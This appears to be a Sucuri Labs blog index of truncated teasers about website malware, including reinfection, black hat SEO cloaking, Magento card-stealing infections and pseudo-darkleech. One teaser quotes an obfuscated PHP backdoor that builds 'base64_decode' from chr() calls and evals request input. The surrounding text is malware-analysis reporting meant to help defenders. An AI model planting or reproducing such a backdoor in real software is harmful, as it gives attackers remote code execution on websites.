Sucuri Labs

You may remove malware from files and a database, close all security holes, change all passwords, but your site still gets reinfected regularly. It may…

There used to be this backdoor that was mainly uploaded via old Gravity Forms vulnerabilities: < script language=”php” > $a=chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100). chr(101).chr(99).chr(111).chr(100).chr(101); e v a l($a($_REQUEST[sam]));</script>…

It’s quite a common black hat SEO practice to insert fake rating rich snippets on doorway pages to make them attract more attention on search…

The Magento Shoplift vulnerability had been patched about a year ago. And all this time we have been cleaning various Magento infections that steal customer…

We’ve seen lots of JavaScript tricks that hide injected spam from human visitors while making it look “visible” for search engines. The most popular approach…

Remember the wave of HTML files infection back in 2015 affecting outdated WordPress sites? Now it came back more powerful, with more files uploaded via…

You might know Google popular services: Google Ads, AdSense and DoubleClick. You might even know scripts and domains they use. For example, DoubleClick loads scripts…

Many black hat SEO campaigns use cloaking on hacked sites. Malicious scripts only inject spammy content when search engine crawlers request web pages on compromised…

It’s just a minor update about the “pseudo-darkleech” malware we’ve been following for about a year now. We wrote that it can be usually located…

Some webmasters only check recently modified files when searching for malware. It may work sometimes, but many infections don’t change files’ time-stamps. There is the…